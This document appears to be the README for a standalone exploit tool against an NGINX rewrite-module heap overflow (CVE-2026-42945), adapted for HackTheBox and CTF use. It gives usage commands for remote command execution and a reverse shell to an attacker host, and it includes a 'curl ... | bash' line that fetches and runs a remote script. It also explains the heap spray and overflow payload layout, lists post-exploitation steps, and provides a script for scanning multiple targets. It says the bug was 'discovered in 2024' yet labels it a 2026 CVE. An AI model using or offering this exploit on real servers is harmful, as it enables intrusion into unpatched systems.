Standalone exploit for the NGINX heap buffer overflow vulnerability discovered in 2024. This version is optimized for HackTheBox and CTF environments where you can't set up Docker containers.

CVE-2026-42945 is a critical heap buffer overflow in NGINX's ngx_http_rewrite_module that has existed since 2008 (version 0.6.27). The bug occurs when:

1. A rewrite directive contains ? in the replacement (sets is_args = 1)
2. A set directive captures part of the URI
3. The length calculation happens on a zeroed sub-engine (sees is_args = 0)
4. The copy phase runs on the main engine (sees is_args = 1)
5. URI escaping expands characters 3x, overflowing the undersized buffer

• NGINX Open Source: 0.6.27 - 1.30.0
• NGINX Plus: R32 - R36

• NGINX Open Source: 1.31.0, 1.30.1
• NGINX Plus: R36 P4, R35 P2, R32 P6

1. nginx_rift_htb.py - Main exploit script
2. nginx_rift_helper.py - Reconnaissance and info leak helper
3. README.md - This file

# Python 3.6+
sudo apt update
sudo apt install python3 netcat-openbsd

# No additional Python packages needed - uses only stdlib!

python3 nginx_rift_htb.py --target 10.10.11.x --check-only

This will:

• Detect if NGINX is running
• Try to identify the version
• Check for the /api/ endpoint
• Report if target appears vulnerable

python3 nginx_rift_helper.py --target 10.10.11.x --all

This performs:

• NGINX fingerprinting
• Version detection
• Endpoint discovery
• Information leak detection
• Behavioral analysis

Execute a command:

python3 nginx_rift_htb.py --target 10.10.11.x --port 80 --cmd "id"

Get a reverse shell:

# Start listener first (in another terminal)
nc -lvnp 4444

# Run exploit
python3 nginx_rift_htb.py --target 10.10.11.x --shell --lhost 10.10.14.5 --lport 4444

# Execute 'id' command
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id"

# Execute 'whoami'
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "whoami"

# Read /etc/passwd
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "cat /etc/passwd"

# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --shell \
    --lhost 10.10.14.5 \
    --lport 4444 \
    --verbose

python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --port 8080 \
    --cmd "curl http://10.10.14.5/shell.sh | bash" \
    --tries 20 \
    --verbose

1. Heap Spray: The exploit sends multiple POST requests with crafted bodies containing a fake ngx_pool_cleanup_s structure
2. Overflow Trigger: Sends a GET request to /api/ with specially crafted URI that will overflow when escaped
3. Cleanup Hook: The overflow corrupts an adjacent pool's cleanup pointer to point to our fake structure
4. Code Execution: When the pool is destroyed, it calls system() with our command

• Target bytes: 6-byte addresses that must contain only URL-safe characters
• Spray body: 4000-byte POST body containing fake cleanup structure
• Overflow payload: 349 'A' + 969 '+' characters that expand 3x during escape

The exploit assumes ASLR is disabled or you know the addresses. On HTB:

• Some boxes disable ASLR for easier exploitation
• Others require finding an information leak
• The helper script can assist with reconnaissance

If ASLR is enabled, you may need to:

1. Find an info leak in the application
2. Brute force (requires many attempts)
3. Use partial overwrites (advanced)

• Verify the target is actually running NGINX
• Check if the port is correct
• May be behind a WAF/proxy

The vulnerable configuration requires:

location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;
    set $original_endpoint $1;
}

• The exploit may still work if rewrite+set exist elsewhere
• Try different common paths: /api/, /admin/, /internal/

Possible reasons:

1. ASLR is enabled - Addresses are randomized

   • Solution: Find info leak or brute force

2. Different libc version - system() at different offset

   • Solution: Try all offsets with --verbose

3. Version not vulnerable - Fixed version or different config

   • Solution: Verify version with helper script

4. WAF/IDS blocking - Security controls in place

   • Solution: May need evasion techniques

5. Wrong endpoint - Not using rewrite+set combo

   • Solution: Find the actual vulnerable endpoint

Always use --verbose for debugging:

python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id" --verbose

This shows:

• Each spray request status
• Connection attempts
• Overflow trigger timing
• Crash detection logic

# Find your tun0 IP
ip addr show tun0 | grep inet

# Use this IP for --lhost
python3 nginx_rift_htb.py --target TARGET --shell --lhost YOUR_TUN0_IP --lport 4444

Once you get initial access:

# Upgrade to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background and set terminal
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

# Check current user
id
whoami

# Check for flags
find / -name "user.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null

# Check sudo permissions
sudo -l

# Check SUID binaries
find / -perm -4000 2>/dev/null

If you need to customize the payload:

# Edit the make_body() function in nginx_rift_htb.py
# Adjust BODY_LEN for different configurations
# Modify the overflow string (349 'A' + 969 '+')

# Create a target list
cat targets.txt
10.10.11.23
10.10.11.24
10.10.11.25

# Test each one
while read target; do
    echo "Testing $target"
    python3 nginx_rift_htb.py --target $target --check-only
done < targets.txt

#!/bin/bash
TARGET=$1
LHOST=$2

echo "[*] Starting listener..."
nc -lvnp 4444 &
LISTENER_PID=$!

sleep 2

echo "[*] Running exploit..."
python3 nginx_rift_htb.py \
    --target $TARGET \
    --shell \
    --lhost $LHOST \
    --lport 4444 \
    --verbose

wait $LISTENER_PID

location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # Sets is_args=1
    set $original_endpoint $1;                     # Allocates based on is_args=0
}

1. Spray POST → Fill heap with fake cleanup structures
2. GET /api/AAAA...++++...X → Trigger overflow
3. Overflow corrupts adjacent pool cleanup pointer
4. Pool destroyed → Calls system(cmd)

[Heap Spray Body - 4000 bytes]
+0:  system_addr (8 bytes)
+8:  data_addr (8 bytes) 
+16: next (8 bytes, NULL)
+24: command_string (variable)
+remaining: padding 'A'

• Original POC: https://github.com/p3Nt3st3r-sTAr/CVE-2026-42945-POC
• Technical Write-up: https://depthfirst.com/research/nginx-rift
• NGINX Advisory: https://my.f5.com/manage/s/article/K000160932
• CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42945

This tool is provided for educational purposes and authorized security testing only. Using this against systems you don't own or have explicit permission to test is illegal. The author assumes no liability for misuse.

• Original vulnerability discovered by depthfirst
• Original POC: p3Nt3st3r-sTAr
• HTB adaptation: Modified for standalone use

Educational/Research purposes only. Use responsibly.